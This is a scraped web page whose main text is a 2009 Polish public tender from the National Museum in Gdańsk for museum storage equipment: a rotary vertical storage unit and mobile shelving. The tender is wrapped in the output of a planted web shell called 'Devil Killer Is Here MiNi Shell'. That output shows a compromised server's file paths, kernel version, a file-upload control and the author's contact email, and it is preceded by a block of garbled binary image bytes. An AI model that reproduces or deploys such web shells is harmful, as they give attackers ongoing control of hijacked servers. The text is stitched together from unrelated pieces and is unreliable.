JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20091022/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20091022/185495-N-2009.html

<p class="kh_header"><b>Gdańsk: Dostawę specjalistycznego sprzętu magazynowego do przechowywania muzealiów -  przetarg realizowany w 2 zadaniach częściowych:
Zadanie 1. dostawa i montaż 1szt. urządzenia mechanicznego typu magazynowego   rotacyjnego, przeznaczonego do składowania muzealiów (zbiorów rysunku i grafiki) wraz z elektronicznym systemem ograniczenia dostępu.
Zadanie 2.  dostawa i montaż 10 regałów przesuwnych i 1 nieruchomego, przeznaczonych do składowania muzealiów np. w postaci ceramiki</b><br>
<b>Numer ogłoszenia: 185495 - 2009; data zamieszczenia: 22.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Narodowe w Gdańsku , ul. Toruńska 1, 80-822 Gdańsk, woj. pomorskie, tel. 058 301 70 61, faks (058) 301 11 25.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.narodowe.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytcja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę specjalistycznego sprzętu magazynowego do przechowywania muzealiów -  przetarg realizowany w 2 zadaniach częściowych:
Zadanie 1. dostawa i montaż 1szt. urządzenia mechanicznego typu magazynowego   rotacyjnego, przeznaczonego do składowania muzealiów (zbiorów rysunku i grafiki) wraz z elektronicznym systemem ograniczenia dostępu.
Zadanie 2.  dostawa i montaż 10 regałów przesuwnych i 1 nieruchomego, przeznaczonych do składowania muzealiów np. w postaci ceramiki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa i montaż  specjalistycznego sprzętu magazynowego do przechowywania muzealiów -  przetarg realizowany w 2 zadaniach częściowych:
Zadanie 1. dostawa i montaż 1szt. urządzenia mechanicznego typu magazynowego   rotacyjnego, przeznaczonego do składowania muzealiów (zbiorów rysunku i grafiki) wraz z elektronicznym systemem ograniczenia dostępu.
Zadanie 2.  dostawa i montaż 10 regałów  przesuwnych i 1 nieruchomego przeznaczonych do składowania muzealiów np. w postaci ceramiki.

ZADANIE NR 1.

Określenie przedmiotu oraz wielkości lub zakresu zamówienia: 
Przedmiotem, niniejszego postępowania o udzielenie zamówienia publicznego jest dostawa i montaż 1szt. urządzenia mechanicznego typu magazynowego rotacyjnego, przeznaczonego do składowania muzealiów (zbiorów rysunku i grafiki) wraz z elektronicznym systemem ograniczenia dostępu. Miejsce posadowienia urządzenia znajduje się na II piętrze budynku głównego Muzeum Narodowego w Gdańsku przy ul.Toruńskiej 1, zgodnie z poniższym opisem przedmiotu zamówienia.
1.	Opis zakresu przedmiotu zamówienia:
1.1.	dostawa i montaż urządzenia magazynowego, uwzględniający uwarunkowania techniczne dotyczące pomieszczenia, w którym nastąpi montaż- zawarte w punkcie 2, 
 1.2. uruchomienie dostarczonego systemu składowania, jego rejestracja w UDT (w przypadku takiej konieczności regulowanej odrębnymi przepisami) wraz z niezbędnymi opłatami w wyniku rejestracji i dopuszczenia do użytkowania, 
  1.3. dokumentacja powykonawcza wraz ze wszystkimi dokumentami potwierdzającymi zdolność do użytkowania na własny koszt,
  1.4. szkolenie pracowników Zamawiającego w liczbie nie większej niż 10 osób w siedzibie Zamawiającego,
  1.5. gwarancja i serwis eksploatacyjny 36 miesięcy.

     2.   Parametry pomieszczenia 

         W budynku głównym MNG przy ul. Toruńskiej 1 w Gdańsku znajdują się pomieszczenia przeznaczone do składowania muzealiów. Wysokość pomieszczenia przewidzianego do wyposażenia w system zautomatyzowanego składowania pionowego wynosi 2,80m, maksymalny ciężar urządzenia do składowania eksponatów 1600kg (bez eksponatów), maksymalna szerokość urządzenia 4,70m, maksymalna głębokość 1,20m - powyższe dane są określone wymiarami pomieszczenia oraz nośnością stropu. Zasilanie urządzenia energią elektryczną. Zał. Nr 1.

     3.  Wymagane parametry techniczne urządzenia magazynującego:

3.1. zespół napędowy elektryczny o zasilaniu 230 lub 400V zapewniający stabilizację prędkości dwóch kolumn napędowych,
3.2. nośność urządzenia składującego - min. 2.200 kg, 
3.3. ilość niezależnych poziomów składowania - nie mniej niż 15, z których każdy będzie posiadał nie mniej niż cztery podpory przenoszące ciężar na element przemieszczający (np. łańcuch) będący mechanizmem przemieszczającym składowane eksponaty w pionie (góra-dół),
3.4. wyposażenie niezależnych poziomów składowania w systemowe rozwiązania służące ewentualnym dalszym podziałom przestrzeni składowania, kompatybilny z systemem oferowanym przez Wykonawcę,
3.5. wymiary powierzchni składowania: głębokość nie mniej niż 540mm, wysokość przestrzeni składowania na niezależnym poziomie nie mniej niż 380mm, szerokość samodzielnego poziomu składowania nie mniej niż 3000mm,
3.6.  ograniczenie mechaniczne dostępu do części znajdujących się w ruchu (oprócz zastosowania drzwi otwieranych na zewnątrz urządzenia z uwagi na kolizję z drzwiami wejściowymi do pomieszczenia) dopuszcza się roletę, drzwi suwane,
3.7. zabezpieczenie mechaniczne przestrzeni dostępowej przed osobami niepowołanymi,
3.8. zabezpieczenie elektroniczne w postaci kontroli dostępu, 
3.9. zabezpieczenia antysabotażowe, 
3.10. zabezpieczenia antysejsmiczne,
3.11. czujnik temperatury i wilgotności współpracujący z systemem istniejącym w Muzeum Narodowym w Gdańsku produkcji firmy LAB-EL,
3.12. kontrola dostępu do każdego poziomu składowania,
3.13. praca urządzenia dwukierunkowa (góra-dół),
3.14. elektroniczne zabezpieczenie przed obecnością rąk i innych elementów zewnętrznych w przestrzeni z przemieszczającymi się poziomami składowania (np. przez zastosowanie fotokomórek),
3.15. wyposażenie urządzenia w wyłącznik awaryjny STOP odcinający zasilanie,
3.16. panel sterujący wyposażony w alfanumeryczną klawiaturę oraz sterowanie pozwalające na jednoznaczne odszukanie eksponatu po jego numerze inwentarzowym wraz z ekranem wskazującym na realizowaną funkcję czy fazę działania,
3.17. panel sterujący przyjmujący i wyświetlający wszystkie sekwencje w języku polskim,
3.18. blat roboczy na poziomie między 750-850mm ponad podłogą pomieszczenia o długości równej szerokości okna dostępowego do urządzenia i głębokości minimum 500mm,
3.19. oświetlenie blatu roboczego światłem sztucznym.

ZADANIE NR 2

 Określenie przedmiotu oraz wielkości przedmiotu zamówienia:
Przedmiotem niniejszego postępowania o udzielenie zamówienia publicznego jest dostawa i montaż 10 regałów przesuwnych i 1 nieruchomego, przeznaczonych do składowania muzealiów np. w postaci ceramiki w pomieszczeniu znajdującym się na II piętrze budynku głównego Muzeum narodowego w Gdańsku przy ul. Toruńskiej 1 , zgonie z poniższym opisem przedmiotu zamówienia.
1.	Opis zakresu przedmiotu zamówienia:
1.1.    dostawa 10 regałów przesuwnych i 1 regału nieruchomego - końcowego  i montaż kompletnego urządzenia magazynowego, wg opisu zamieszczonego  poniżej, uwzględniający uwarunkowania techniczne dotyczące pomieszczenia, w którym nastąpi montaż- zawarte w punkcie 2,
1.2.   uruchomienie urządzenia wraz ze szkoleniem z zakresu sposobu użytkowania i możliwości systemu,
1.3.   szkolenie w siedzibie zamawiającego z zakresu eksploatacji urządzenia,
1.4.   regulacja i korekta regałów przesuwnych w pomieszczeniu magazynowym w okresie 6 miesięcy,
1.5.	   serwis eksploatacyjny i gwarancja 36 miesięcy.

2.	Parametry pomieszczenia 
       W budynku głównym MNG przy ul. Toruńskiej 1 w Gdańsku znajdują się pomieszczenia przeznaczone do składowania muzealiów. Wysokość pomieszczenia przewidzianego do wyposażenia w system regałów przesuwnych pozwala na montaż regałów o wysokości 3,00m, maksymalny ciężar urządzenia do składowania eksponatów łącznie z półkami, napędem i torowiskiem wynosi 3.300kg (bez eksponatów), powierzchnia przeznaczona przez Zamawiającego do zainstalowania regałów przesuwnych to 2,00 x 12,00m. - powyższe dane są określone w wyniku ograniczeń wymiarami pomieszczenia oraz nośnością stropu. Zał nr 2.

3.	Parametry techniczne urządzenia magazynującego:
3.1.ilość regałów: jeden nieruchomy oparty plecami o ścianę końcową magazynu z dostępem jednostronnym, 10 regałów przesuwnych z dostępem dwustronnym- ilość wynikająca z możliwości zabudowy pozostałej powierzchni magazynu opisanej w p.1.,
3.2. minimalna nośność półki - 65kg/m2,
3.3. ilość półek regulowanych w jednym pionie regału przesuwnego - minimum 8 plus półka kryjąca stała, stanowiąca element zamykający regał od góry,
3.4. wymagane wymiary powierzchni składowania półki regału dwustronnego 1,00m x 2,00m,
3.5. wymagane wymiary powierzchni składowania półki regału jednostronnego 0,50m x 2,00m,
3.6. ścianki boczne regału o konstrukcji ramowej wykonane z minimum trzech słupków, posiadających podwójną perforację na każdym słupku pozwalającą wprowadzić mocowania utrzymujące półki,
3.7. wewnętrzne podziały regałów dwustronnych z otwartą konstrukcją usztywniającą regał,
boki regałów osłonięte panelami ze stali perforowanej wyposażonymi w tabliczkę opisową lub ramkę na opis,
3.8. mocowanie półek systemowe i usztywniające konstrukcję (np.haczyk, w kształcie ceownika lub podobnie z dwoma równoległymi wypustami mocującymi lub podobnie w inny jednoznaczny sposób), mocowania te wykonane są ze stali ocynkowanej,
3.9. półki wykonane z blachy stalowej malowanej proszkowo, dłuższe krawędzie półki minimum trzykrotnie zagięte o kąt 90o, krótsze krawędzie minimum dwukrotnie zagięte o kąt 90o, narożniki łączone mechanicznie (za pomocą zaciśnięcia),
3.10. poziom półki w regale regulowany minimum co 20 mm, umożliwiający łatwe przemieszczanie półek bez użycia narzędzi,
3.11. szyny jezdne ze stali walcowanej na gorąco, ocynkowanej, o szerokości minimum 75 mm,
3.12. koła regałów przejezdnych o średnicy minimum 150mm wykonane z metalu odlewanego lub toczonego (nie tworzywo sztuczne),
3.13. podstawy regałów wykonane z minimum dwóch belek głównych oraz belek poprzecznych z zimnowalcowanej stali lakierowanej,
3.14. grubość blachy konstrukcyjnej minimum 2 mm,
3.15. wysokość podstawy regału minimum 140 mm,
2.16. odstęp pomiędzy dolną krawędzią podstawy a górną powierzchnią torowiska winien wynosić  nie więcej niż 20 mm,
3.17. podstawy jezdne mają posiadać zabezpieczenie regału przed wywróceniem,
3.18. wszystkie regały wyposażone będą w gumowe odbojniki,
3.19. przesuw regału odbywać się ma za pomocą trójramiennej metalowej korby, uchwyty trójramiennej korby wykonane z materiału, który zapobiega poślizgowi dłoni na uchwycie podczas obracania korbą, mają posiadać konstrukcję pozwalającą na uzyskanie niezależnego obracania wokół własnej osi podczas obracania korby w celu uzyskania pełnej kontroli przesuwu regałów,
3.20. wszystkie elementy metalowe systemu regałów ocynkowane galwanicznie i malowane proszkowo po wykonaniu wszystkich otworów technologicznych i elementów mocujących- Zamawiający dokona sprawdzenia w wybranym miejscu, 
3.21. każda półka wyposażona dodatkowo w 3 listwy z profilu metalowego mocowane w zależności od potrzeb użytkownika wzdłuż przedniej lub tylnej krawędzi każdej półki za pomocą identycznych mocowań jak dla półek, z możliwością regulacji zawieszenia co 20 mm (listwy te mają chronić przechowywane zbiory przed ich wypadnięciem),
3.22. zabezpieczenie mechaniczne przed przesuwaniem regałów przez osoby nieuprawnione - blokada mechaniczna (zamek, blokada torowiska),
3.23. wyposażenie dodatkowe: 
	3.23.1. drabina lub schody aluminiowe do obsługi górnych półek zgodnie z wymogami   BHP,
	3.23.2. pianka poliuretanowa typu LAZY FOAM  o gęstości pozornej do 55 kg/m3 o grubości minimum 20mm w ilości 100m2..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.14.11.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2.	posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, to znaczy: w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należy wykazać się co najmniej 3 zrealizowanych dostaw sprzętu określonego w zamówieniu o wartości  50.000,00 zł każda- dla każdego zadania oddzielnie.
3.	nie podlegać wykluczeniu z postępowania o udzielenie zamówienia publicznego.
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia-niespełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	oświadczenie o spełnieniu warunków określonych art. 22 ust. 1 ustawy Prawo Zamówień Publicznych - załącznik nr 5,
2.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
3.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4.	Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.  
5.	wykaz wykonanych, w okresie ostatnich trzech lat zamówień, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 3   zrealizowanych dostaw sprzętu określonego w zamówieniu o wartości  50.000,00 zł każda, z podaniem ich wartości oraz daty i miejsca wykonania potwierdzających warunek określony w rozdziale VI pkt. 2  SIWZ - załącznik nr 4,
6.	dokumenty potwierdzające należyte wykonanie zadań wskazanych w załączniku nr 4 ,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.muzeum.narodowe.gda.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Narodowe w Gdańsku
ul. Toruńska 1 pok. 108
80-822 Gdańsk.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.10.2009 godzina 10:00, miejsce: Muzeum Narodowe w Gdańsku
ul. Toruńska 1 pok. 108
80-822 Gdańsk.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1. dostawa i montaż 1szt. urządzenia mechanicznego typu magazynowego   rotacyjnego, przeznaczonego do składowania muzealiów (zbiorów rysunku i grafiki) wraz z elektronicznym systemem ograniczenia dostępu..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem, niniejszego postępowania o udzielenie zamówienia publicznego jest dostawa i montaż 1szt. urządzenia mechanicznego typu magazynowego rotacyjnego, przeznaczonego do składowania muzealiów (zbiorów rysunku i grafiki) wraz z elektronicznym systemem ograniczenia dostępu. Miejsce posadowienia urządzenia znajduje się na II piętrze budynku głównego Muzeum Narodowego w Gdańsku przy ul.Toruńskiej 1, zgodnie z poniższym opisem przedmiotu zamówienia.
1.	Opis zakresu przedmiotu zamówienia:
1.1.	dostawa i montaż urządzenia magazynowego, uwzględniający uwarunkowania techniczne dotyczące pomieszczenia, w którym nastąpi montaż- zawarte w punkcie 2, 
 1.2. uruchomienie dostarczonego systemu składowania, jego rejestracja w UDT (w przypadku takiej konieczności regulowanej odrębnymi przepisami) wraz z niezbędnymi opłatami w wyniku rejestracji i dopuszczenia do użytkowania, 
  1.3. dokumentacja powykonawcza wraz ze wszystkimi dokumentami potwierdzającymi zdolność do użytkowania na własny koszt,
  1.4. szkolenie pracowników Zamawiającego w liczbie nie większej niż 10 osób w siedzibie Zamawiającego,
  1.5. gwarancja i serwis eksploatacyjny 36 miesięcy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.14.11.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2.  dostawa i montaż 10 regałów  przesuwnych i 1 nieruchomego przeznaczonych do składowania muzealiów np. w postaci ceramiki..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego postępowania o udzielenie zamówienia publicznego jest dostawa i montaż 10 regałów przesuwnych i 1 nieruchomego, przeznaczonych do składowania muzealiów np. w postaci ceramiki w pomieszczeniu znajdującym się na II piętrze budynku głównego Muzeum narodowego w Gdańsku przy ul. Toruńskiej 1 , zgonie z poniższym opisem przedmiotu zamówienia.
1.	Opis zakresu przedmiotu zamówienia:
1.1.    dostawa 10 regałów przesuwnych i 1 regału nieruchomego - końcowego i montaż kompletnego urządzenia magazynowego, wg opisu zamieszczonego  poniżej, uwzględniający uwarunkowania techniczne dotyczące pomieszczenia, w którym nastąpi montaż- zawarte w punkcie 2,
1.2.   uruchomienie urządzenia wraz ze szkoleniem z zakresu sposobu użytkowania i możliwości systemu,
1.3.   szkolenie w siedzibie zamawiającego z zakresu eksploatacji urządzenia,
1.4.   regulacja i korekta regałów przesuwnych w pomieszczeniu magazynowym w okresie 6 miesięcy,
1.5.	   serwis eksploatacyjny i gwarancja 36 miesięcy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.14.11.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com